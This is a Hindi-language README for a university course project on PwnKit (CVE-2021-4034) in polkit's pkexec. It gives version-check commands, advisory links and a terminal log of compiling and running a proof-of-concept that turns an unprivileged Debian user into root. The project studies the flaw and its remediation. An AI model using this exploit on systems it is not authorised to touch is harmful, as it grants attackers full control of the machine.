
सॉफ्टवेयर भेद्यताएँ और शमन विश्वविद्यालय पाठ्यक्रम, इस भेद्यता के कारण होने वाले शोषण और उपचार को दिखाने के लिए।
सॉफ़्टवेयर भेद्यताएँ और शमन विश्वविद्यालय परियोजना, जो इस भेद्यता के कारण होने वाले शोषण और निवारण को प्रदर्शित करती है। इस प्रयोग के लिए हमने Ubunto संस्करण 16.04 LTS और Debian 10.1.0 का उपयोग किया, जिसे प्रयोग में दिखाया जाएगा। पर्यावरण स्थापित करना आवश्यक था, क्योंकि आपको हमेशा उस संस्करण को सत्यापित करने की आवश्यकता होती है जिस पर आप काम कर रहे हैं, ताकि यह सुनिश्चित हो सके कि यह असुरक्षित है या नहीं। उपयोग की गई जाँच कमांड: dpkg -l | grep polkit, pkexec --version
PwnKit के लिए PoC: polkit के pkexec में स्थानीय विशेषाधिकार वृद्धि भेद्यता (CVE-2021-4034)
https://seclists.org/oss-sec/2022/q1/80
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
Debian 10 और Ubunto 16.0.4 पर सत्यापित
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)